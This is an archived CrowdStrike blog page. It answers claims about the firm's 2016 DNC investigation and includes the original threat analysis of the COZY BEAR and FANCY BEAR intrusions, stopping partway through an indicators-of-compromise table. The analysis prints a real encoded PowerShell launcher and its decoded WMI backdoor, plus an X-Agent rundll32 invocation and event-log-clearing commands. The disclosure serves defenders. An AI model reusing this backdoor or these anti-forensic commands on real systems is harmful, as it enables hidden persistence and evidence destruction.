{ "id": "0652eaa0-eba9-4a26-b6fa-ab1b23996d78", "created_at": "2026-04-06T00:13:39.936274Z", "updated_at": "2026-04-10T03:37:50.106661Z", "deleted_at": null, "sha1_hash": "c2621e0a5c1e5ea12983cc105c4e671f7af41d98", "title": "CrowdStrike’s work with the Democratic National Committee: Setting the record straight", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 159929, "plain_text": "CrowdStrike’s work with the Democratic National Committee: Setting\r\nthe record straight\r\nBy Editorial Team\r\nArchived: 2026-04-05 14:19:27 UTC\r\nJune 5, 2020 UPDATE\r\nBlog update following the release of the testimony by Shawn Henry, CSO and President of CrowdStrike Services, before the\r\nHouse Intelligence Committee that was recently declassified.\r\nWhat was CrowdStrike’s role in investigating the hack of the DNC?\r\nCrowdStrike was contacted on April 30, 2016 to respond to a suspected breach. We began our work with the DNC on May\r\n1, 2016, collecting intelligence and analyzing the breach. After conducting this analysis and identifying the adversaries on\r\nthe network, on June 10, 2016 we initiated a coordinated remediation event to ensure the intruders were removed and could\r\nnot regain access. That remediation process lasted approximately 2-3 days and was completed on June 13, 2016.\r\nWhy did the DNC contact CrowdStrike?\r\nThe DNC contacted CrowdStrike to respond to a suspected cyber attack impacting its network. The DNC was first alerted to\r\nthe hack by the FBI in September 2015. According to testimony by DNC IT contractor Yared Tamene Wolde-Yohannes, the\r\nFBI attributed the breach to the Russian Government in September 2015 (page 7).\r\nWhy did the DNC hire CrowdStrike instead of just working with the FBI to investigate the hack?\r\nThe FBI doesn’t perform incident response or network remediation services when organizations need to get back to business\r\nafter a breach. CrowdStrike is a leader in protecting customers around the world from cyber threats. It is common for\r\norganizations to hire third-party industry experts, like CrowdStrike, to investigate and remediate cyber attacks when they\r\nsuspect a breach even if they are collaborating with law enforcement. As John Carlin, former Assistant Attorney General for\r\nthe National Security Division at The Department of Justice, testified before the House Intelligence Committee (cited from\r\npage 21 of his testimony): “A lot of -- outside of any political organization, companies, most corporations, they often would\r\nuse these third party contractors, who they hired through their own counsel, and maximize the control from the point of view\r\nof the victim.”\r\nDid CrowdStrike have proof that Russia hacked the DNC?\r\nYes, and this is also supported by the U.S. Intelligence community and independent Congressional reports. Following a\r\ncomprehensive investigation that CrowdStrike detailed publicly, the company concluded in May 2016 that two separate\r\nRussian intelligence-affiliated adversaries breached the DNC network. To reference, CrowdStrike’s account of their DNC\r\ninvestigation, published on June 14, 2016, “CrowdStrike Services Inc., our Incident Response group, was called by the\r\nDemocratic National Committee (DNC), the formal governing body for the US Democratic Party, to respond to a suspected\r\nbreach. We deployed our IR team and technology and immediately identified two sophisticated adversaries on the network –\r\nCOZY BEAR and FANCY BEAR…. At DNC, COZY BEAR intrusion has been identified going back to summer of 2015, while\r\nFANCY BEAR separately breached the network in April 2016.” This conclusion has most recently been supported by the\r\nSenate Intelligence Committee in April 2020 issuing a report validating the previous conclusions of the Intelligence\r\ncommunity, published on January 6, 2017, that Russia was behind the DNC data breach. The Senate report states on page\r\n48: “The Committee found that specific intelligence as well as open source assessments support the assessment that\r\nPresident Putin approved and directed aspects of this influence campaign.” Furthermore, in his testimony in front of the\r\nHouse Intelligence Committee, Shawn Henry stated the following with regards to CrowdStrike’s degree of confidence that\r\nthe intrusion activity can be attributed to Russia, cited from page 24:\r\n1. HENRY: We said that we had a high degree of confidence it was the Russian Government. And our analysts that\r\nlooked at it and that had looked at these types of attacks before, many different types of attacks similar to this in\r\ndifferent environments, certain tools that were used, certain methods by which they were moving in the\r\nenvironment,and looking at the types of data that was being targeted, that it was consistent with a nation-state\r\nadversary and associated with Russian intelligence.\r\nHave any other organizations concluded that Russia was behind the DNC hack?\r\nYes. CrowdStrike’s conclusion that Russia was behind the DNC hack is supported by the U.S. Intelligence community and\r\nalso by independent Congressional reports. Most recently, the Senate Intelligence Committee released a report in April 2020\r\nthat validated the previous conclusions of the Intelligence Community Assessment, published on January 6, 2017, all\r\nconcluding that Russia was behind the DNC data breach.\r\nhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/\r\nPage 1 of 8\n\nPage 157 of the Senate report states that the Select Committee on Intelligence “conducted an extensive examination\r\nof the intelligence demonstrating Russia's intrusions into DNC networks.“ Senator Richard Burr (R - North\r\nCarolina), who served as Chairman of the Senate Intelligence Committee at the time the report was issued, confirmed\r\nthis finding: “The Committee found no reason to dispute the Intelligence Community’s conclusions.”\r\nThe Intelligence Community Assessment, published on January 6, 2017 also confirms that Russia was behind the\r\nDNC hack, stating on page 2 of the report: “In July 2015, Russian intelligence gained access to Democratic National\r\nCommittee (DNC) networks and maintained that access until at least June 2016. This unclassified ODNI report was\r\nbased on extensive classified intelligence collected by the CIA, NSA, and FBI; the ODNI determined the classified\r\nintelligence should not be released in order to protect the sensitive sources and methods by which it was collected.\r\nIt’s also worth noting that other security companies, including Fidelis and FireEye have supported CrowdStrike’s analysis.\r\nDoes CrowdStrike have evidence that data was exfiltrated from the DNC network?\r\nYes. Shawn Henry stated in his testimony to the House Intelligence Committee that CrowdStrike had indicators of\r\nexfiltration (page 32) and that data had clearly left the network. Also, on page 2, the Intelligence Community Assessment\r\nalso confirmed that the Russian intelligence agency GRU “had exfiltrated large volumes of data from the DNC.”\r\nDid CrowdStrike see in real-time the adversaries exfiltrate data and emails from the DNC network?\r\nNo and that’s typical for incident response cases. In the vast majority of cyber investigations, incident responders don’t\r\nwitness exfiltration in real-time. In fact, often we are called in after theft has taken place. We collect forensics, evidence of\r\nprior activity on the network, map where the adversary has gained access and prepare remediation plans. In this particular\r\ncase, CrowdStrike saw circumstantial evidence of data exfiltration from the DNC network. As a reference point\r\ncircumstantial evidence is the type of evidence such as DNA analysis or fingerprints that are fully admissible in courts.\r\nShawn Henry stated in his testimony that CrowdStrike had indicators of exfiltration (page 32 of the testimony): “Counsel\r\njust reminded me that, as it relates to the DNC' we have indicators that data was exfiltrated. We did not have concrete\r\nevidence that data was exfiltrated from the DNC, but we have indicators that it was exfiltrated.' and circumstantial evidence\r\nthat data was taken as he states on page 75 ”so there is circumstantial evidence that it was taken” and page 76: “MR.\r\nHENRY: So, to go back, because I think it's important to characterize this. We didn't have a network sensor in place that saw\r\ndata leave' We said that the data Ieft based on the circumstantial evidence. That was a conclusion that we made. when I\r\nanswered that question, I was trying to be as factually accurate' I want to provide the facts. so I said that we didn't have\r\ndirect evidence' But we made a conclusion that the data left the network.” On page 32 of the testimony, Henry also explains\r\nthat “We don't have video of it happening, but there are indicators that it happened” and “we did not have concrete\r\nevidence that data was exfiltrated from the DNC, but we have indicators that it was exfiltrated.” As another reference point,\r\nthe independent report by Special Counsel Robert S. Mueller also cites the theft of documents from the DNC and DCCC on\r\npage 40, stating the following: “Officers from Unit 26165 stole thousands of documents from the DCCC and DNC networks,\r\nincluding significant amounts of data pertaining to the 2016 U.S. federal elections. Stolen documents included internal\r\nstrategy documents, fundraising data, opposition research, and emails from the work inboxes of DNC employees.”\r\nIs it true that part of the exfiltration happened after CrowdStrike was already engaged by the DNC?\r\nThis question about the specific timeline of the exfiltration is addressed directly by Shawn Henry in his testimony on page\r\n26. “MR. HENRY: So the analysis started the first day or two in May, and then that was about 4 to 6 weeks. I think, on June\r\n10th, we started what we call the remediation event. so we collected enough intelligence. We identified where the\r\nadversaries were in the environment' We came up with a remediation plan to say we see them in multiple locations. This -\r\nthese are the actions that we need to execute in order to put a new infrastructure in place and to ensure that the adversaries\r\ndon't have access to the new infrastructure. So that would have been June 10th when we started. And we did the remediation\r\nevent over a couple of days.” Of note, it is a standard practice in incident response to first coordinate a remediation event to\r\nprevent the adversary from doing further damage and following that to fully restore network functionality. We followed\r\nindustry best practices to accomplish the fastest remediation path for our customer. On page 27 of Shawn Henry’s testimony,\r\nhe further explains CrowdStrike’s role as incident responders: “To be clear, our goal, my goal was to protect the client. We\r\nwere hired to protect the client. We identified an adversary there. The goal was to make sure that the adversary was removed\r\nand the client had a clean environment with which to work.”\r\nDid any DNC endpoints protected by your technology get breached in subsequent attacks?\r\nThere is no indication of subsequent breaches taking place on any DNC machine protected by CrowdStrike Falcon®.\r\nDo you have a comment about the allegation that Russia stole Democratic Party emails from John Podesta and then\r\npassed them to WikiLeaks?\r\nCrowdStrike was not involved in investigating John Podesta’s email leaks. Henry says on page 62 of this testimony, he “has\r\nno relationship with them .”\r\nWhat is the timeline of the DNC hack?\r\nAccording to public records, this is the timeline of the DNC hack that CrowdStrike was hired to investigate.\r\nhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/\r\nPage 2 of 8\n\nBeginning in July 2015: “Russian intelligence gained access to Democratic National Committee (DNC) networks (\r\npage 2).\r\nSept. 25, 2015: An FBI agent contacted the DNC Information Technology director/contractor in charge of the DNC\r\nnetwork, alerting him to suspicious activity in the network and referencing the “Dukes” (p16), a well-known\r\npseudonym in the cybersecurity community for Russian government actors. The FBI agent called the DNC again in\r\nOctober 2015, November 2015, December 2015 (p12) asking the contractor to “corroborate, to look into specific\r\nactivities that the FBI had noticed emanating from the DNC network that could be nefarious.” (p8)\r\nBeginning in December 2015: Russian intelligence actors engaged in attacks on election systems, including\r\nscanning a “widely used vendor of election systems,” according to DHS. The attacks continued through June\r\n2016 (p30.)\r\nBeginning April 2016: The GRU “…stole thousands of documents from the DCCC and DNC networks, including\r\nsignificant amounts of data pertaining to the 2016 U.S. federal elections. Stolen documents included internal strategy\r\ndocuments, fundraising data, opposition research, and emails from the work inboxes of DNC employees.” (p40)\r\nApril 14, 2016: “The GRU began stealing DCCC data shortly after it gained access to the network. On April 14,\r\n2016 (approximately three days after the initial intrusion) GRU officers downloaded rar.exe onto the DCCC’s\r\ndocument server. The following day, the GRU searched one compromised DCCC computer for files containing\r\nsearch terms that included “Hillary,” “DNC,” “Cruz,” and “Trump.\"\r\nApril 28, 2016: The DNC contractor discovered unusual activity on the DNC network. “…the first day that we found\r\nactivity on our network that was unusual, nefarious by adversaries…” \"we saw sort of very loud activity… on one of\r\nour Window servers that couldn't have been done by one of us…an authorized user. The kinds of activity we were\r\nlooking at was accessing multiple different password vaults of different users, which is not something that anyone\r\nwould do. And so that triggered an alarm for us…” (p24)\r\nApril 30, 2016: CrowdStrike was contacted by the DNC outside counsel to discuss a suspected breach. This was\r\nCrowdStrike’s first involvement in this matter. (p6)\r\nMay 1-2, 2016: CrowdStrike initiated an investigation into the breach of the DNC network. (p26)\r\nJune 10-13, 2016: The DNC network remediation took place. (p35)\r\nJune 13, 2016: CrowdStrike and the DNC outside counsel alerted the FBI that they had identified Russian actors on\r\nthe DNC network. (p35)\r\nJune 2016: The FBI requested forensic information, indicators of compromise (pieces of malicious code) that\r\nCrowdStrike discovered on the DNC computer network. With DNC permission, CrowdStrike continued to share\r\ninformation from the breach through December 2016, including “digital images” or copies of hard-drives. (p35)\r\nJune 14, 2016: The DNC, via CrowdStrike, publicly announced the breach of the DNC network and detailed its\r\ninvestigation.\r\nJuly 29, 2016: The DCCC publicly announced it was a victim of Russian hacking.\r\nAugust 26, 2016: Separate cyber activity continued on state election systems through Dec 29, 2016 ( p25-26.) Later\r\nit was discovered the Russians had, at least, scanned a total of 21 state election infrastructures. (p50)\r\nSeptember 20, 2016: “On September 20, 2016, the GRU began to generate copies of the DNC data using function\r\ndesigned to allow users to produce backups of databases (referred to as “snapshots”). The GRU then stole those\r\nsnapshots by moving them to account that they controlled, from there the copies were moved to GRU-controlled\r\ncomputers. The GRU stole approximately 300 gigabytes of data from the DNC cloud-based account.” (pp 49-50)\r\nOctober 7, 2016: DHS \u0026 ODNI release joint statement about stolen emails: “The U.S. Intelligence Community\r\n(USIC) is confident that the Russian Government directed the recent compromises of e-mails from US persons and\r\ninstitutions, including from US political organizations….These thefts and disclosures are intended to interfere with\r\nthe US election process.(p1)\r\nJanuary 6, 2017. “The Department of Homeland Security (DHS) designated the infrastructure used to administer the\r\nNation’s elections as critical infrastructure. This designation recognizes that the United States’ election infrastructure\r\nis of such vital importance to the American way of life that its incapacitation or destruction would have a devastating\r\neffect on the country.” (p1)\r\nJanuary 22, 2020 UPDATE\r\nCrowdStrike is non-partisan - we routinely work with both Republican and Democratic organizations to protect them from\r\ncyber-attacks - along with thousands of other organizations around the world of all industries and sizes. Here are a few key\r\nfacts about CrowdStrike:\r\nWe were founded in California and are headquartered in the heart of Silicon Valley in Sunnyvale, California. We are\r\none of the fastest growing global companies in cybersecurity today.\r\nOur founders have no connections to Ukraine. Suggestions to the contrary are completely false.\r\nWe have never had physical possession of the DNC servers. We conducted our investigation using a process called\r\n“imaging” — an established practice in cyber investigations that involves making a copy of the hard drives and\r\nmemory. This is standard procedure for cyber investigations.\r\nWe worked closely with law enforcement and provided all forensic evidence and analysis to the FBI as requested.\r\nWe are proud of our work and will remain focused on our mission of protecting our customers around the world from\r\ndangerous cyber threats.We are grateful that the media has debunked false claims about our work for the Democratic\r\nhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/\r\nPage 3 of 8\n\nNational Committee (DNC) in 2016:\r\nThe Washington Post, The Russians manipulated our elections. We helped.\r\nAn opinion piece by David Ignatius discussing the lessons from Thomas Rid’s new book, making the case that\r\nthe 2016 election meddling was a proven example of Russia’s disinformation tenet.\r\nThe New York Times, Republican-Led Review Backs Intelligence Findings on Russian Interference:\r\nA three-year review by the Republican-led Senate Intelligence Committee unanimously found that the\r\nintelligence community assessment stating that Russia breached the DNC was fundamentally sound and\r\nuntainted by politics.\r\nNBC News, Meet the Press 12/29/19:\r\nClint Watts and Chuck Todd discuss CrowdStrike and the conspiracy theory that has been debunked.\r\nTranscript here: https://www.nbcnews.com/meet-the-press/meet-press-december-29-2019-n1106036\r\nThe Washington Post, In call to Ukraine’s president, Trump revived a favorite conspiracy theory about the DNC\r\nhack:\r\nDiscusses the CrowdStrike conspiracy theory and how it has been debunked.\r\nCNN Business, What is CrowdStrike and why is it part of the Trump whistleblower complaint?:\r\nGives background on CrowdStrike and debunks the conspiracy theory\r\nWired, How Trump’s Ukraine Mess Entangled CrowdStrike:\r\nDiscusses the CrowdStrike theory and debunks the idea that there is a missing server.\r\nNBC News, Debunking The Crowdstrike Conspiracy Theory\r\nDiscusses the CrowdStrike theory and how it has been debunked.\r\nThe Daily Beast, The Truth About Trump’s Insane Ukraine ‘Server’ Conspiracy:\r\nDescribes why Trump’s theories about Ukraine and CrowdStrike have been debunked.\r\nCNN, “Don’t miss the totally debunked conspiracy theory Donald Trump pushed in the Ukraine call”\r\nDiscusses the conspiracy theory and how it has been debunked.\r\nSeptember 25, 2019 Update:\r\nWith regards to our investigation of the DNC hack in 2016, we provided all forensic evidence and analysis to the FBI. As\r\nwe’ve stated before, we stand by our findings and conclusions that have been fully supported by the US Intelligence\r\ncommunity.\r\nFAQ on Recent News Coverage of CrowdStrike\r\nIs your owner Ukrainian?\r\nNo. CrowdStrike was founded by George Kurtz and Dmitri Alperovitch. George is an American entrepreneur and\r\nrecognized security expert, author, entrepreneur, and speaker. He also started Foundstone, a worldwide security products and\r\nservices company that was acquired by McAfee in 2004. CrowdStrike’s Co-founder Dmitri Alperovitch is a Russia-born\r\nU.S. citizen, who has spent all of his adult life in the United States, and has no connection to Ukraine. As a public company,\r\nour ownership is available on the SEC.gov website.\r\nDo you stand behind your work for the DNC?\r\nAs we’ve repeatedly stated, we stand by the findings and analysis of our investigation, and, as detailed in our company\r\nstatement, we’ve provided all forensic evidence and analysis to the FBI as requested. Additionally, our findings have been\r\nsupported by the U.S. intelligence community and other cybersecurity companies. The investigation is detailed on our blog\r\nbelow.\r\nDid you comply with FBI’s requests for information?\r\nWe’ve provided all forensic evidence and analysis to the FBI related to the DNC investigation as requested. We have never\r\ndeclined any request for information from the FBI related to this investigation, and there are no pending requests for\r\ninformation by the FBI.\r\nDo you have the DNC servers?\r\nWe have never taken physical possession of any DNC servers. When cyber investigators respond to an incident, they capture\r\nthat evidence in a process called “imaging.” It involves making an exact byte-for-byte copy of the hard drives. They do the\r\nsame for the machine’s memory, capturing evidence that would otherwise be lost at the next reboot, and they monitor and\r\nstore the traffic passing through the victim’s network. This has been standard procedure in incident response investigations\r\nfor decades. The images, not the computer’s hardware, provide the evidence. Our cloud-native, crowdsourced approach to\r\nsolving cybersecurity enables us to deliver state- of-the-art protection to organizations big and small. Consequently, we are\r\nproud that customers from every major industry, level of government, and political affiliation turn to CrowdStrike to stop\r\nbreaches.\r\nAre you affiliated with the Democratic party?\r\nhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/\r\nPage 4 of 8\n\nCrowdStrike is not affiliated with any political party. We are a public cybersecurity company, and are non-partisan. We have\r\ndone cybersecurity work for, and currently protect, both Republican and Democratic political organizations at the state,\r\nlocal, and federal level, and we have thousands of non-political companies and organizations as customers.\r\nDo you have Secretary Hillary Clinton’s email server? Have you ever had access to her emails?\r\nNo. We have never worked for Secretary Clinton or her campaign, and never had access to her server or emails.\r\nWhere can I find more information?\r\nMany news outlets have written about CrowdStrike’s investigation of the DNC hack and subsequent comments made by\r\nPresident Trump. You can learn more at:\r\nNBC News, November 14, 2019: Debunking The Crowdstrike Conspiracy Theory\r\nCNN, September 30, 2019: \"Don't miss the totally debunked conspiracy theory Donald Trump pushed in the Ukraine\r\ncall\"\r\nAP/Washington Post, September 27, 2019: \"Why Trump asked Ukraine’s president about ‘CrowdStrike’\"\r\nDaily Beast, September 25, 2019: \"The Truth About Trump’s Insane Ukraine ‘Server’ Conspiracy\"\r\nWired, September 25, 2019: \"How Trump’s Ukraine Mess Entangled CrowdStrike\"\r\nDaily Beast, July 17, 2019: \"Trump’s ‘Missing DNC Server’ Is Neither Missing Nor a Server\"\r\nSecurity Week, October 4, 2018: \"The DNC Hacker Indictment: A Lesson in Failed Misattribution\"\r\nDaily Beast, July 16, 2018 : \"Trump’s ‘Missing DNC Server’ Is Neither Missing Nor a Server\"\r\nDaily Beast, June 13, 2018: \"Mueller Indicts 12 Russian Officers for Hacking Dems in 2016\"\r\nU.S. Department of Justice Indictment, June 13, 2018: \"Case 1:18-cr-00215-ABJ\"\r\nArsTechnica, March 23, 2018: \"DNC “lone hacker” Guccifer 2.0 pegged as Russian spy after opsec fail”\r\nTech Crunch, March 22, 2018: \"More evidence ties alleged DNC hacker Guccifer 2.0 to Russian intelligence”\r\nAP, January 26, 2018: \"Report: Dutch spies caught Russian hackers on tape”\r\nDe Volkskrant, January 25, 2018: \"Dutch Intelligence Watched Russian Hackers Attack the U.S”\r\nAP, November 2, 2017: \"Russia hackers pursued Putin foes, not just US Democrats”\r\nThe Hill, August 14, 2017: \"Why the latest theory about the DNC not being hacked is probably wrong”\r\nDaily Beast, July 20, 2017: \"Putin’s Hackers Now Under Attack—From Microsoft”\r\nWashington Post, July 6, 2017: \"Here’s the public evidence that supports the idea that Russia interfered in the 2016\r\nelection”\r\nSenate testimony of Thomas Rid, March 30, 2017\r\nSenate testimony of Kevin Mandia, March 30, 2017\r\nWired Magazine, March 5, 2017: “Hunting the DNC hackers: how Crowdstrike found proof Russia hacked the\r\nDemocrats”\r\nNew York Times, Jan. 6, 2017: “Intelligence Report on Russian Hacking” (includes full copy of the official U.S.\r\nIntelligence and Law Enforcement Agency report):\r\nNew York Times, Dec. 13, 2016: “The Perfect Weapon: How Russian Cyberpower Invaded the U.S.”\r\nWashington Post, June 20, 2016: “Cyber researchers confirm Russian government hack of Democratic National\r\nCommittee”\r\nThreatConnect Blog, June 17, 2016: “Rebooting Watergate: Tapping into the Democratic National Committee”\r\nSecureWorks Blog, June 16, 2016: “Russian Threat Group Targets Clinton Campaign”\r\nJune 15, 2016 UPDATE:\r\nCrowdStrike stands fully by its analysis and findings identifying two separate Russian intelligence-affiliated adversaries\r\npresent in the DNC network in May 2016. On June 15, 2016 a blog post to a Wordpress site authored by an individual using\r\nthe moniker Guccifer 2.0 claimed credit for breaching the Democratic National Committee. This blog post presents\r\ndocuments alleged to have originated from the DNC. Whether or not this posting is part of a Russian Intelligence\r\ndisinformation campaign, we are exploring the documents’ authenticity and origin. Regardless, these claims do nothing to\r\nlessen our findings relating to the Russian government’s involvement, portions of which we have documented for the public\r\nand the greater security community.\r\nJune 14, 2016\r\nBears in the Midst: Intrusion Into the Democratic National Committee\r\nBy Dmitri Alperovitch\r\nThere is rarely a dull day at CrowdStrike where we are not detecting or responding to a breach at a company somewhere\r\naround the globe. In all of these cases, we operate under strict confidentiality rules with our customers and cannot reveal\r\npublicly any information about these attacks. But on rare occasions, a customer decides to go public with information about\r\ntheir incident and give us permission to share our knowledge of the adversary tradecraft with the broader community and\r\nhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/\r\nPage 5 of 8\n\nhelp protect even those who do not happen to be our customers. This story is about one of those cases. CrowdStrike Services\r\nInc., our Incident Response group, was called by the Democratic National Committee (DNC), the formal governing body for\r\nthe US Democratic Party, to respond to a suspected breach. We deployed our IR team and technology and immediately\r\nidentified two sophisticated adversaries on the network - COZY BEAR and FANCY BEAR. We’ve had lots of experience\r\nwith both of these actors attempting to target our customers in the past and know them well. In fact, our team considers them\r\nsome of the best threat actors out of all the numerous nation-state, criminal and hacktivist/terrorist groups we encounter on a\r\ndaily basis. Their tradecraft is superb, operational security second to none and the extensive usage of ‘living-off-the-land’\r\ntechniques enables them to easily bypass many security solutions they encounter. In particular, we identified advanced\r\nmethods consistent with nation-state level capabilities including deliberate targeting and ‘access management’ tradecraft -\r\nboth groups were constantly going back into the environment to change out their implants, modify persistent methods, move\r\nto new Command \u0026 Control channels and perform other tasks to try to stay ahead of being detected. Both adversaries\r\nengage in extensive political and economic espionage for the benefit of the government of the Russian Federation and are\r\nbelieved to be closely linked to the Russian government’s powerful and highly capable intelligence services. COZY BEAR\r\n(also referred to in some industry reports as CozyDuke or APT 29) is the adversary group that last year successfully\r\ninfiltrated the unclassified networks of the White House, State Department, and US Joint Chiefs of Staff. In addition to the\r\nUS government, they have targeted organizations across the Defense, Energy, Extractive, Financial, Insurance, Legal,\r\nManufacturing Media, Think Tanks, Pharmaceutical, Research and Technology industries, along with Universities. Victims\r\nhave also been observed in Western Europe, Brazil, China, Japan, Mexico, New Zealand, South Korea, Turkey and Central\r\nAsian countries. COZY BEAR’s preferred intrusion method is a broadly targeted spearphish campaign that typically\r\nincludes web links to a malicious dropper. Once executed on the machine, the code will deliver one of a number of\r\nsophisticated Remote Access Tools (RATs), including AdobeARM, ATI-Agent, and MiniDionis. On many occasions, both\r\nthe dropper and the payload will contain a range of techniques to ensure the sample is not being analyzed on a virtual\r\nmachine, using a debugger, or located within a sandbox. They have extensive checks for the various security software that is\r\ninstalled on the system and their specific configurations. When specific versions are discovered that may cause issues for the\r\nRAT, it promptly exits. These actions demonstrate a well-resourced adversary with a thorough implant-testing regime that is\r\nhighly attuned to slight configuration issues that may result in their detection, and which would cause them to deploy a\r\ndifferent tool instead. The implants are highly configurable via encrypted configuration files, which allow the adversary to\r\ncustomize various components, including C2 servers, the list of initial tasks to carry out, persistence mechanisms, encryption\r\nkeys and others. An HTTP protocol with encrypted payload is used for the Command \u0026 Control communication. FANCY\r\nBEAR (also known as Sofacy or APT 28) is a separate Russian-based threat actor, which has been active since mid 2000s,\r\nand has been responsible for targeted intrusion campaigns against the Aerospace, Defense, Energy, Government and Media\r\nsectors. Their victims have been identified in the United States, Western Europe, Brazil, Canada, China, Georgia, Iran,\r\nJapan, Malaysia and South Korea. Extensive targeting of defense ministries and other military victims has been observed,\r\nthe profile of which closely mirrors the strategic interests of the Russian government, and may indicate affiliation with\r\nГлавное Разведывательное Управление (Main Intelligence Department) or GRU, Russia’s premier military intelligence\r\nservice. This adversary has a wide range of implants at their disposal, which have been developed over the course of many\r\nyears and include Sofacy, X-Agent, X-Tunnel, WinIDS, Foozer and DownRage droppers, and even malware for Linux,\r\nOSX, IOS, Android and Windows Phones. This group is known for its technique of registering domains that closely\r\nresemble domains of legitimate organizations they plan to target. Afterwards, they establish phishing sites on these domains\r\nthat spoof the look and feel of the victim’s web-based email services in order to steal their credentials. FANCY BEAR has\r\nalso been linked publicly to intrusions into the German Bundestag and France’s TV5 Monde TV station in April 2015. At\r\nDNC, COZY BEAR intrusion has been identified going back to summer of 2015, while FANCY BEAR separately breached\r\nthe network in April 2016. We have identified no collaboration between the two actors, or even an awareness of one by the\r\nother.\r\nInstead, we observed the two Russian espionage groups compromise the same systems and engage separately in the theft of\r\nidentical credentials. While you would virtually never see Western intelligence agencies going after the same target without\r\nde-confliction for fear of compromising each other’s operations, in Russia this is not an uncommon scenario. “Putin’s\r\nHydra: Inside Russia’s Intelligence Services”, a recent paper from European Council on Foreign Relations, does an excellent\r\njob outlining the highly adversarial relationship between Russia’s main intelligence services - Федеральная Служба\r\nБезопасности (FSB), the primary domestic intelligence agency but one with also significant external collection and ‘active\r\nmeasures’ remit, Служба Внешней Разведки (SVR), the primary foreign intelligence agency, and the aforementioned GRU.\r\nNot only do they have overlapping areas of responsibility, but also rarely share intelligence and even occasionally steal\r\nsources from each other and compromise operations. Thus, it is not surprising to see them engage in intrusions against the\r\nsame victim, even when it may be a waste of resources and lead to the discovery and potential compromise of mutual\r\noperations. The COZY BEAR intrusion relied primarily on the SeaDaddy implant developed in Python and compiled with\r\npy2exe and another Powershell backdoor with persistence accomplished via Windows Management Instrumentation (WMI)\r\nsystem, which allowed the adversary to launch malicious code automatically after a specified period of system uptime or on\r\na specific schedule. The Powershell backdoor is ingenious in its simplicity and power. It consists of a single obfuscated\r\ncommand setup to run persistently, such as:\r\npowershell.exe -NonInteractive -ExecutionPolicy Bypass -EncodedCommand\r\nZgB1AG4AYwB0AGkAbwBuACAAcABlAHIAZgBDAHIAKAAkAGMAcgBUAHIALAAgACQAZABhAHQAYQApAA0ACgB7AA0ACgAJACQA\r\nThis decodes to:\r\nhttps://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/\r\nPage 6 of 8\n\nfunction perfCr($crTr, $data){ $ret = $null try{ $ms = New-Object System.IO.MemoryStream $cs = New-Object\r\nSystem.Security.Cryptography.CryptoStream -ArgumentList @($ms, $crTr, ::Write) $cs.Write($data, 0, $data.Length)\r\n$cs.FlushFinalBlock() $ret = $ms.ToArray() $cs.Close() $ms.Close() } catch{} return $ret } function decrAes($encData,\r\n$key, $iv) { $ret = $null try{ $prov = New-Object System.Security.Cryptography.RijndaelManaged $prov.Key = $key\r\n$prov.IV = $iv $decr = $prov.CreateDecryptor($prov.Key, $prov.IV) $ret = perfCr $decr $encData } Catch{} return $ret }\r\nfunction sWP($cN, $pN, $aK, $aI) { if($cN -eq $null -or $pN -eq $null){return $false} try{ $wp =\r\n($cN).Properties\u003c$pN\u003e.Value $exEn = ::FromBase64String($wp) $exDec = decrAes $exEn $aK $aI $ex =\r\n::UTF8.GetString($exDec) if($ex -eq $null -or $ex -eq '') {return} Invoke-Expression $ex return $true } catch{ return $false\r\n} } $aeK = \u003e (0xe7, 0xd6, 0xbe, 0xa9, 0xb7, 0xe6, 0x55, 0x3a, 0xee, 0x16, 0x79, 0xca, 0x56, 0x0f, 0xbc, 0x3f, 0x22, 0xed,\r\n0xff, 0x02, 0x43, 0x4c, 0x1b, 0xc0, 0xe7, 0x57, 0xb2, 0xcb, 0xd8, 0xce, 0xda, 0x00) $aeI = \u003e (0xbe, 0x7a, 0x90, 0xd9,\r\n0xd5, 0xf7, 0xaa, 0x6d, 0xe9, 0x16, 0x64, 0x1d, 0x97, 0x16, 0xc0, 0x67) sWP 'Wmi' 'Wmi' $aeK $aeI | Out-Null\r\nThis one-line powershell command, stored only in WMI database, establishes an encrypted connection to C2 and downloads\r\nadditional powershell modules from it, executing them in memory. In theory, the additional modules can do virtually\r\nanything on the victim system. The encryption keys in the script were different on every system. Powershell version of\r\ncredential theft tool MimiKatz was also used by the actors to facilitate credential acquisition for lateral movement purposes.\r\nFANCY BEAR adversary used different tradecraft, deploying X-Agent malware with capabilities to do remote command\r\nexecution, file transmission and keylogging. It was executed via rundll32 commands such as:\r\nrundll32.exe \"C:\\Windows\\twain_64.dll\"\r\nIn addition, FANCY BEAR’s X-Tunnel network tunneling tool, which facilitates connections to NAT-ed environments, was\r\nused to also execute remote commands. Both tools were deployed via RemCOM, an open-source replacement for PsExec\r\navailable from GitHub. They also engaged in a number of anti-forensic analysis measures, such as periodic event log\r\nclearing (via wevtutil cl System and wevtutil cl Security commands) and resetting timestamps of files. Intelligence\r\ncollection directed by nation state actors against US political targets provides invaluable insight into the requirements\r\ndirected upon those actors. Regardless of the agency or unit tasked with this collection, the upcoming US election, and the\r\nassociated candidates and parties are of critical interest to both hostile and friendly nation states. The 2016 presidential\r\nelection has the world’s attention, and leaders of other states are anxiously watching and planning for possible outcomes.\r\nAttacks against electoral candidates and the parties they represent are likely to continue up until the election in November.\r\nIndicators of Compromise:\r\nIOC Adversary\r\nIOC\r\nType\r\nAdditional Info\r\n6c1bce76f4d2358656132b6b1d471571820688ccdbaca0d86d0ca082b9390536\r\nCOZY\r\nBEAR\r\nSHA256\r\npagemgr.exe\r\n(SeaDaddy implant)\r\nb101cd29e18a515753409ae86ce68a4cedbe0d640d385eb24b9bbb69cf8186ae\r\nCOZY\r\nBEAR\r\nSHA256\r\npagemgr.exe\r\n(SeaDaddy implant)\r\n185\u003c.\u003e100\u003c.\u003e84\u003c.\u003e134:443\r\nCOZY\r\nBEAR\r\nC2 SeaDaddy implant C2\r\n58\u003c.\u003e49\u003c.\u003e58\u003c.\u003e58:443\r\nCOZY\r\nBEAR\r\nC2 SeaDaddy implant C2\r\n218\u003c.\u003e1\u003c.\u003e98\u003c.\u003e203:80\r\nCOZY\r\nBEAR\r\nC2 Powershell implant 